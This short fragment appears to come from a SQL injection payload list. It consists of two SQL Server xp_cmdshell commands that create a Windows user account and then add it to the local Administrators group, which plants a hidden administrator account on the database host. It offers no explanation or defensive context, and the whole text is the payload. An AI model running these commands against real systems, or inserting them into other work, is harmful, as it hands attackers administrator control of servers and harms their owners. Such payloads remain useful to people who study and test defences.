EXEC master..xp_cmdshell "net user username password /add" EXEC master..xp_cmdshell "net localgroup administrators username /add"